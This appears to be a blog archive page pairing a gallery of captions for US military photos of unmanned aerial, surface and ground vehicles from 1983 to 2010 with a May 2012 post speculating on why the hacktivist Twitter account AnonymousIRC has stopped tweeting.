with partner nations in the U.S. Southern Command area of responsibility.
(U.S. Navy photo by Mass Communication Specialist 2nd Class Lily
Daniels/Released). Date Shot: 3/24/2010[Image]

U.S. Navy Sonar Technician (Surface) 2nd Class Brad Goss, right, and Sonar
Technician (Surface) 1st Class Anthony Craig, left, from the Littoral Combat
Ship Anti-Submarine Warfare (LCS ASW) Mission Package detachment, operate
an unmanned surface vehicle (USV) in the waters of the Narragansett Bay,
R.I., Feb. 16, 2010. The Naval Undersea Warfare Center Division Newport is
developing the USV for future LCS ASW operations. (U.S. Navy photo/Released).
Date Shot: 2/16/2010[Image]

U.S. Navy Mineman Seaman James Raper pushes the mine neutralization vehicle
(MNV) of the mine countermeasures ship USS Defender (MCM 2) into its cradle
Nov. 24, 2009, in the Yellow Sea. An MNV is a remote-controlled, unmanned
submarine that uses a video camera to confirm the presence of underwater
mines. Defender is participating in exercise Clear Horizon, an annual exercise
conducted with the Republic of Korea Navy, that is one of the largest
international mine counter-measures exercises in the world. (U.S. Navy photo
by Mass Communication Specialist 1st Class Richard Doolin/Released). Date
Shot: 11/24/2009[Image]

The U.S Air Force Academy’s Viking 300 aircraft, an unmanned aerial system,
flies over Camp Red Devil at Fort Carson, Colo., July 22, 2009. The Air Force
Academy is the first military service academy to begin integrating unmanned
aerial systems into its curriculum. (U.S. Air Force photo by Mike
Kaplan/Released). Date Shot: 7/23/2009[Image]

An Unmanned Little Bird helicopter, a smaller version of the manned A/MH-6M
Little Bird helicopter, is tested and evaluated by personnel from the U.S.
Marine Corps’ Warfighting Laboratory at Marine Corps Combat Development Command,
Quantico, Va., June 16, 2009, in Bridgeport, Calif., during Javelin Thrust-09.
Marine Forces Reserve, headquartered in New Orleans, is conducting Javelin
Thrust-09 at six locations throughout the Western United States. The combined
arms exercise showcases a range of combat and logistics capabilities and
allows leaders to assess the operational readiness of participating units.
More than 2,000 reserve- and active-component Marines, Sailors, Soldiers
and Airmen are training simultaneously in support of the exercise. (U.S.
Marine Corps photo by Chief Warrant Officer Keith A. Stevenson/Released).
Date Shot: 6/16/2009[Image]

Dirk D. Reum, a robotic systems engineer, conducts a systems check of a robotic
unmanned ground vehicle (RUGV) June 13, 2009, in Hawthorne, Nev., before
making it available for test training with U.S. Marine Corps infantrymen
of India Company, 3rd Battalion, 23rd Marine Regiment, 4th Marine Division,
during exercise Javelin Thrust 2009. The RUGV has a payload capacity of 1,400
pounds. Javelin Thrust showcases a wide range of combat and logistics
capabilities, and allows leaders to assess the operational readiness of
participating units. More than 3,000 reserve and active component Marines
and members of the Navy, Army and Air National Guard will train during the
combined arms exercise at six locations throughout the Western United States.
(U.S. Marine Corps photo by Chief Warrant Officer 2 Keith A. Stevenson/Released).
Date Shot: 6/13/2009[Image]

The Heron TP medium altitude long endurance unmanned aerial vehicle takes
off from Comalapa International Airport in San Salvador, El Salvador, May
21, 2009, during a counter drug operations support mission. The Heron is
part of an unmanned aircraft system deployed to El Salvador to support Project
Monitoreo, a month-long evaluation initiative to assess the suitability of
using unmanned aircraft for counterdrug missions in the United States Southern
Command area. (U.S. Army photo by Jose Ruiz/Released). Date Shot: 5/21/2009[Image]

The U.S. Navy and Spatial Integrated Systems Inc. demonstrate a fully autonomous
Unmanned Surface Vehicle (USV) near Fort Monroe, Va., Jan. 14, 2009. The
USV uses its autonomous maritime navigation systems to patrol and detect
intruders. (U.S. Navy photo by Mass Communication Specialist Seaman Apprentice
Joshua Adam Nuzzo/Released). Date Shot: 1/14/2009[Image]

U.S. Navy Lt. Timothy Stanford, a graduate student at University of Wisconsin,
tests his Autonomous Unmanned Vehicle (AUV) prior to competing in the Association
for Unmanned Vehicle Society International’s (AUVSI) 11th annual competition
in San Diego, Calif., Aug. 1, 2008. AUVSI, in cooperation with the Space
and Naval Warfare Systems Center, hosts the event to encourage young engineers
and scientists to consider careers developing AUV technologies for the U.S.
Navy. (U.S. Navy photo by Mass Communication Specialist 2nd Class Brian
Gaines/Released). Date Shot: 8/1/2008[Image]

Fox News reporter Phil Keating interviews U.S. Navy Capt. Robert Dishman,
the Persistent Maritime Unmanned Aircraft Systems Program Office 262 Program
Manager, in front of the Skyship 600 blimp at Naval Air Station Key West,
Fla., July 10, 2008. The lighter-than-air vehicle is in Key West for six
weeks to conduct a series of maritime surveillance evaluations. The joint
airship experiment between the U.S. Navy and Coast Guard emphasizes the
cooperative strategy for 21st century seapower among the sea services. (U.S.
Navy photo by Mass Communication Specialist 2nd Class Rachel McMarr/Released).
Date Shot: 7/10/2008[Image]

An unmanned aerial vehicle’s Predator Hellfire missile is shown on a simulator’s
virtual camera at the March Air Reserve Base in Riverside County, Calif.,
June 25, 2008. As the U.S. military scrambles to get more robotic warplanes
like the Predator drone aloft, it is confronting an unexpected adversary:
human error. (Damian Dovarganes)[Image]

Secretary of Defense Robert M. Gates learns how to operate an unmanned ground
vehicle during a tour of the future combat systems facility at Fort Bliss,
Texas, May 1, 2008. (Department of Defense photo by Cherie Cullen/Released).
Date Shot: 5/1/2008[Image]

A Condor unmanned aerial vehicle sits on top of its carrying case before
flying during Atlantic Strike V at the air-ground training complex in Avon
Park, Fla., April 17, 2007. Atlantic Strike is a U.S. Central Command Air
Forces initiative and the only joint, tactical-level, urban, close air support
training event dedicated to supporting the war on terror. (U.S. Air Force
photo by Staff Sgt. Stephen Otero) (Released). Date Shot: 4/17/2007[Image]

US Marine Corps (USMC) Marines, 15th Marine Expeditionary Unit (MEU) show
the US Navy (USN) Sailors aboard the USN Wasp Class Amphibious Assault Ship
USS BOXER (LHD 4) the “Silver Fox” Unmanned Aerial Vehicle (UAV). The 15th
MEU and the BOXER are part of Expeditionary Strike Group (ESG) 5 which is
currently participating in their Composite Training Unit Exercise (COMPTUEX)
off the coast of Southern California. U.S. Navy photo by Mass Communication
Specialist Third Class Noel Danseco (RELEASED). Date Shot: 7/16/2006[Image]

Engineers check the structure after the test flights of the Navy-built Guardian
Griffin unmanned aerial vehicle (UAV). The flights demonstrated its capability
to support U.S. joint forces with missions ranging from convoy escort and
port security to combat patrol. U.S. Navy photo by Mr. John Joyce (RELEASED).
Date Shot: 5/18/2006[Image]

The Proteus aircraft takes off from Mojave Airfield near Edwards Air Force
Base, Calif., on May 9, 2006. It carries the pod that eventually will contain
the radar that will be used on the Global Hawk unmanned aerial vehicle. A
year of testing, that will be conducted by the 851st Electronic Testing Group,
will begin in September once the radar is installed on Proteus. (U.S. Air
Force photo) (Released). Date Shot: 5/9/2006[Image]

Northrop Grumman’s RQ-8A Fire Scout Vertical Takeoff and Landing Tactical
Unmanned Aerial Vehicle (VTUAV) test fires the second of two Mark (MK) 66
2.75-inch unguided rockets during weapons testing at Arizona’s Yuma Proving
Grounds. The Fire Scout has the ability to autonomously take off and land
from any aviation-capable warship and at unprepared landing zones, with an
on-station endurance of over four hours. The Fire Scout system is capable
of continuous operations, providing coverage at 110 nautical miles from the
launch site. Utilizing a baseline payload that includes electro-optical/infrared
sensors and a laser rangefinder/designator the Fire Scout can find and identify
tactical targets, track and designate targets, accurately provide targeting
data to strike platforms, employ precision weapons, and perform battle damage
assessment. Photographer’s Name: TIM PAYNTER, CIV. Date Shot: 7/25/2005[Image]

U.S. Air Force Tech. Sgt. Patrick Vasquez, a Force Protection Airborne
Surveillance System (FPASS) operator from the 99th Security Forces Group,
prepares to release a Desert Hawk unmanned aerial vehicle during an urban
warfare training at Indian Springs Auxiliary Air Field, Nev., on May 4, 2005.
The Desert Hawk gives real-time video surveillance to FPASS operators who
in turn are able to instantly relay enemy force locations to the troops in
the field. (U.S. Air Force photo by Master Sgt. Robert W. Valenca) (Released).
Date Shot: 5/4/2005[Image]

A U.S. Air Force BQM-167A Unmanned Aerial Vehicle (UAV) is launched from
Tyndall Air Force Base, Fla., on Dec. 22, 2004. The BQM-167A is powered by
a ventrally mounted turbojet engine. It can be air or ground launched, and
can carry the full range of current target payloads, including radar enhancers,
countermeasures, scoring devices, and towed targets. (USAF Photo by Bruce
Hoffman, CIV) (Released). Date Shot: 12/22/2004

[Image]

A Boeing ScanEagle Unmanned Aerial Vehicle (UAV) sits on top of a table during
a demonstration at Indian Springs Auxiliary Field, N.V., on Dec. 18, 2004.
The U.S. military uses the four-foot-long UAV as a forward observer to monitor
enemy concentrations, vehicle and personnel movement, buildings and terrain
in Iraq. (USAF Photo by Tech. Sgt. Kevin J.Gruenwald) (Released). Date Shot:
12/18/2004 [Engine and propeller unit is rotated 90-degrees for service.]

[Image]

Mark LaVille, the Scan Eagle Project manager from Boeing Corporation, and
Brett Kelley, a support engineer with the Insitu Group also from Boeing,
uses an electronic blower to cool the engine of a Scan Eagle unmanned aerial
vehicle during an urban warfare exercise at Indian Springs Auxiliary Air
Field, Nev., on May 4, 2005. Scan Eagle flies at low altitudes while taking
video surveillance and it feeds images directly to security forces personnel
in the field. (U.S. Air Force photo by Master Sgt. Robert W. Valenca) (Released).
Date Shot: 5/4/2005[Image]

U.S. Air Force maintenance personnel prepare to push Global Hawk Air Vehicle
Number 3 (AV-3) into its hangar after its 400th mission at an undisclosed
location in support of Operation Iraqi Freedom on Nov. 8, 2004. The Global
Hawk is an unmanned aerial vehicle designed for surveillance and reconnaissance.
(USAF Photo by Tech. Sgt. Erik Gudmundson) (Released). Date Shot: 11/8/2004[Image]

An AGM-114 Hellfire missile hung on the rail of an US Air Force (USAF) MQ-1L
Predator Unmanned Aerial Vehicle (UAV) is inscribed with, “IN MEMORY OF HONORABLE
RONALD REAGAN.” Photographer’s Name: TSGT SCOTT REED, USAF. Date Shot: 6/10/2004[Image]

Tracked and wheeled versions of the Gladiator Tactical Unmanned Ground Vehicles
(TUGV) take a forward position to determine security of the area. The Gladiators
are taking part in a live fire exercise with 1st Battalion, 2nd Marines (1/2),
Bravo Company (B CO), Marine Corps Base (MCB) Camp Lejeune, North Carolina
(NC), at Range 400 aboard Marine Air Ground Task Force Training Command
(MAGTF-TC), Twentynine Palms, California (CA). Photographer’s Name: LCPL
PATRICK GREEN, USMC. Date Shot: 1/14/2004[Image]

Lt. Col. George Biondi, Director of Operations for the 82nd Aerial Targets
Squadron, Tyndall Air Force Base, Florida, flies this QF-4 “Rhino” as a safety
chase on the wing of a remote-controlled unmanned QF-4 “Rhino” full-scale
aerial target drone after a Combat Archer Air-to-Air Weapons System Evaluation
Program mission over the Gulf of Mexico. The QF-4 Phantom II, affectionately
known as the “Rhino”, is used as a threat-representative unmanned target
for live-fire test and evaluation missions. It maintains the basic flight
envelope capabilities of the original F-4, and can also be flown manned for
workup and remote controller training missions. United States Air Force QF-4′s
are flown by the 82nd Aerial Targets Squadron from Tyndall Air Force Base,
Florida and Holloman Air Force Base, New Mexico. (U.S. Air Force photo Tech.
Sgt. Michael Ammons) (Released). Date Shot: 9/16/2003[Image]

A VMU-2′s Unmanned Air Vehicle (UAV) is ready for launch off a Pneumatic
Launcher on the desert floor. Photographer’s Name: LCPL RICHARD W. COURT,
USAF. Date Shot: 3/9/2003[Image]

Chief of Naval Operations (CNO) Admiral Vern Clark listens to Steve Castelin
of NAVSEA Coastal Systems Station, as he talks about the future of unmanned
aerial vehicles (UAV) such as the Blue Fin currently displayed on Nov. 26,
2002. The CNO is in Panama City, Fla., to see new technology hardware and
to visit with local area community leaders. (U.S. Navy photo by Chief
Photographer’s Mate Johnny Bivera) (RELEASED). Date Shot: 11/26/2002[Image]

A RQ-1L Predator UAV (Unmanned Aerial Vehicle) from the 57th Wing Operations
Group, Nellis AFB, NV sits in a maintenance bunker at a forward operating
airbase in the ENDURING FREEDOM area. The Predator is a medium-altitude,
long-endurance, unmanned aerial vehicle system used for reconnaissance,
surveillance and target acquisition and is in Afghanistan in direct support
of Operation ENDURING FREEDOM. Photographer’s Name: CWO2 William D. Crow,
USMC. Date Shot: 2/14/2002[Image]

Operations Specialist 1st Class Guy Hurkmans of Escanaba, Mich., assigned
to Destroyer Squadron 50 (DESRON50), Naval Support Activity, Bahrain manually
launches an Unmanned Air Vehicle (UAV) during a flight test that is being
conducted in support of Maritime Interception Operations (MIO) on Jan. 6,
2002. (U.S. Navy photo by Photographer’s Mate 1st Class Ted Banks) (Released).
Date Shot: 1/6/2002[Image]

Army personnel walk out and position the Hunter UAV (Unmanned Aerial Vehicle)
for takeoff at Petrovec Airfield, Skopje, Macedonia, in support of TASK FORCE
HARVEST. The role of TASK FORCE HARVEST is to collect arms and ammunition
voluntarily turned over by ethnic Albanian insurgents, and thereby helps
to build confidence in the broader peace process suggested by the President
of former Yugoslav Republic of Macedonia. The Hunter UAV plays a key role
in helping NATO troops by surveying and looking for any changes in the local
area that might hinder the peacekeeping mission. Photographer’s Name: SSGT
JOCELYN M. BROUSSARD, USAF. Date Shot: 9/13/2001[Image]

The new Dragon Eye Unmanned Aerial Reconnaissance Vehicle sits partially
disassembled prior to a demonstration given to commanders during Kernel Blitz
Experimental aboard Camp Pendleton, Calif., on June 23, 2001. The Dragon
Eye is controlled line of sight via computer and can transmit real time video
imagery back to the operator. (U.S. Marine Corps photo by Sgt. John Vannucci)
(Released) Date Shot: 6/23/2001[Image]

The Global Hawk heads back towards its hangar after doing preflight checks
before going on a twenty four hour mission out of Edinburgh Air Force Base
in Adelaide, South Australia, in support of Exercise Tandem Thrust. The Global
Hawk is a jet powered Unmanned Aerial Vehicle (UAV) designed as a Reconnaissance
and Surveillance vehicle with a wing span equal to a Boeing 737, flying at
altitudes of up to 65,000 feet for more than 24 hours and capable of searching
an area of more than 40,000 square miles. The Global Hawk is deployed to
Australia from April to June 2001, flying more than a dozen missions. These
missions will include sorties in support of Tandem Thrust as well as maritime,
littoral, land surveillance and stand off reconnaissance capabilities. The
Global Hawk completed its first successful maiden flight in February 1998.
Currently there are five U.S. Air Force Global Hawks which have logged over
60 flights and have clocked more than 600 hours, with its biggest challenge
to date the non-stop Trans-Pacific flight from Edwards AFB CA to Edinburgh
AFB South Australia. Exercise Tandem Thrust 2001 is a combined United States
and Australian military training exercise. This biennial exercise is being
held in the vicinity of Shoalwater Bay Training Area, Queensland, Australia.
More than 27,000 Soldiers, Sailors, Airmen and Marines are participating,
with Canadian units taking part as opposing forces. The purpose of Exercise
Tandem Thrust is to train for crisis action planning and execution of contingency
response operations. Photograph CLEARED FOR RELEASE by Lt. Col. Pat Bolibrzuch,
Australian Deployment Commander, Global Hawk Program Office and Wing Commander
Brett Newell, Deputy Director Emerging Systems, Aerospace Development Branch.
U.S. Navy Photo by PH3 J. Smith (Released). Photographer’s Name: PH3 JENNIFER
A. SMITH. Date Shot: 5/13/2001[Image]

The Broad-area Unmanned Responsive Resupply Operations (BURRO) is used in
conjunction with the Slice Multi-Task Boat (only flight deck is seen) for
providing over the horizon sea-based logistics. The BURRO (also known as
the KAMAN K-1200 K-MAX Helicopter) is also used for resupplying ships at
sea. It is currently on the flightdeck of the Slice Boat (Prototype) at Coast
Guard Island in Oakland, California, due to its participation in Fleet Battle
Experiment Echo. Also seen in the frame is a right side front view of the
U.S. Coast Guard High Endurance Cutter, USCGC SHERMAN, (WHEC-720). This mission
is in direct support of Urban Warrior ’99. Photographer’s Name: LCPL Christopher
L. Vallee. Date Shot: 3/19/1999[Image]

The Navtec, Incorporated Owl MKII Unmanned Surface Vehicle (USV) glides stealthily
through the waters of Mile Hammock Bay, New River during a demonstration
to highlight its marine reconnaissance capabilities to the Riverine Insertion
Operation Exercise (RIOEX) ’98 participants. The Owl MKII is funded by the
Office of Naval Research (ONR) and is remote-controlled from a small shoreline
control station by Brad Dowling, a Navtec, Inc. electronics engineer, at
Camp Lejeune, North Carolina, during the Riverine Insertion Operation Exercise
(RIOEX) ’98. Photographer’s Name: LCPL T.A. Pope, USMC. Date Shot: 5/14/1998[Image]

The Dragon Drone Unmanned Aerial Vehicle was on display at the MOUT (Military
Operations in Urban Terrain) facility during LOE 1 (Limited Objective Experiment
1). Urban Warrior is the U.S. Marine Corps Warfighting Laboratory’s series
of limited objective experiments examining new urban tactics and experimental
technologies. Photographer’s Name: Sgt. Jason J. Bortz. Date Shot: 1/23/1998[Image]

US Marine Corps Air Ground Combat Center (MCAGCC). A “Night Owl”, or RQ-2A
Pioneer, surveillance Unmanned Aerial Vehicle (UAV) is launched from its
twin rail catapult mounted on a 5-ton truck. This launch is conducted by
the Cherry Point Marine Base, Squadron-2, part of Combined Arms Exercise
(CAX) 5-97 at Airfield Seagle. Photographer’s Name: LCPL E. J. Young. Date
Shot: 4/14/1997[Image]

A close up front view of the fuselage section from the wreckage of a Predator
Unmanned Aerial Vehicle (UAV) laying on a hillside in the Russian sector
of the Multinational Division North (MDN) area of operations. Photographer’s
Name: SSG Edward W. Nino. Date Shot: 10/1/1996[Image]

A civilian contractor tests the unmanned submersible Deep Drone aboard a
US Navy ship. The sonar device is being used during salvage operations for
downed Korean Air Lines Flight 007 (KAL 007). The commercial jet was shot
down by Soviet aircraft over Sakhalin Island in the Sea of Japan on August
30, 1983. All 269 passengers and crewmen were killed. PH1 Fel Barbante, USN

05/14/12

Is AnonymousIRC TangoDown?


gAtO hAs – been looking for tweets from #AnonymousIRC and nothing. For the last 7 days AnonymousIRC has been off the tweet. Maybe a holiday, maybe busy, maybe a Twitter diet.
All we know is that the last tweet was:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Message From France To Nicolas Sarkozy: “Casse-Toi Pauv’Con” #Anonymous #RadioLondres #Hadopi #Loppsi #ACTA #CISPA

2:18 PM Sun May 06 2012 · LulzTweeter

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

and the last retweet came @

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Fact: Right now, #Merkel is sitting in her office, getting drunk and saying “France is gone, Greece is lost, where is Keitel?” #Downfall

2:46 PM Sun May 06 2012 · LulzTweeter

141 RETWEETS
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

So where is AnonymousIRC now? Nobody knows. All we know is that on a nice Sunday afternoon, about 1446, they last re-tweeted and left the world. Of course, if you check out the Twitter search for AnonymousIRC there are lots of mentions but no clue from them. Has another Anonymous hero fallen like SaBu? Will they come back again and try to do the same thing that SaBu did? We all await AnonymousIRC to see what they have to say. -gAtO oUt